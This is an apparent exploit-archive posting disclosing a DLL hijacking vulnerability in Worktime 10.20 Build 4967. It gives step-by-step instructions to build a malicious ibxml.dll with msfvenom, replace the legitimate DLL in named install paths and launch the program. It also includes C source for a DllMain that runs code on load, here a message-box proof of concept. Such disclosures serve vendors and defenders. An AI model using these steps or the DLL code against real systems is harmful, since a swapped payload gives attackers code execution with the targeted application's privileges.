Worktime 10.20 Build 4967 DLL Hijacking

Worktime version 10.20 Build 4967 suffers from a dll hijacking vulnerability.


MD5 | 1b4f869012ea77e97e2c873843b08c74

/* 
Description:
A vulnerability exists in windows that allows other applications dynamic link libraries
to execute malicious code without the users consent, in the privelage context of the targeted application.

Exploit Title: Worktime 10.20 Build 4967 DLL Hijacking Exploit
Date: 15/01/2022
Author: Yehia Elghaly
Vendor: https://www.worktime.com/
Software: https://www.worktime.com/download/worktime_corporate.exe
Version: Latest Worktime 10.20 Build 4967
Tested on: Windows 7 Pro x86 - Windows 10 x64
Vulnerable extensions: .htm .html
Vulnerable DLL: (ibxml.dll - WINSTA.dll)
*/


Instructions:

1. Create dll using msfvenom (sudo msfvenom --platform windows -p windows/messagebox TEXT="Work Time Hacked - YME" -f dll > ibxml.dll) or compile the code
2. Replace ibxml.dll in Worktime directory C:\Program Files\WorkTimeAdministrator or C:\WorkTime with your newly dll
3. Launch WorkTimeServer.exe or WorkTimeAdministrator.exe
4. PoP UP MessageBox!



#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_mll();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}

return TRUE;
}

int dll_mll()
{
MessageBox(0, "WorkTime Hacked!", "YME", MB_OK);
}

Related Posts